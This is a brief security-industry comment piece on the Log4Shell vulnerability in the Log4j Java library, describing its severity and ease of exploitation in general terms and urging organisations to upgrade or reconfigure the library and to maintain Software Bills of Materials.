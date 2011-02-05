Comment: Log4Shell exploited for months to come?

December 2021 by Nicholas Sciberras, head of engineering at Invicti’s Acunetix

"Log4Shell is one of the worst vulnerabilities we have ever seen. It can impact businesses, governments, and consumers directly, and it will be exploited for months to come. It’s powerful, ubiquitous, and easy to use – the ultimate hack for someone who wants to do something malicious – even without sophisticated knowledge.

It’s astonishingly easy. Even a typical script kiddie can perform the attack, it doesn’t require a professional blackhat hacker. This is because it requires no authentication, tricks, or jumping from server to server. It’s simply a text string sent to any place that will be logged. And finding such a place is very easy – it can be a simple header, or a simple text field.

Its impacts are everywhere. Java is one of the most popular languages for web applications, mobile applications – practically everything. Log4j is a library used in nearly every Java installation because it is used for logging server operations. Many applications also keep logs for debugging purposes.

It’s powerful. With this vulnerability, attackers gain almost unlimited power – they can extract sensitive data, upload files to the server, delete data, install ransomware, or pivot to other servers.

So what should organizations do? Every organization needs to immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.

More broadly, it’s becoming clear that organizations must adopt processes to build Software Bills of Materials (SBOM) for every application they deploy. They can then use SBOMs to help them focus incident response actions following a zero-day vulnerability announcement such as Log4Shell. Given the widespread use of open-source and other third-party components in modern applications, SBOMs are a foundational element of cyber resilience."Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, and what it means for cybersecurity here and now.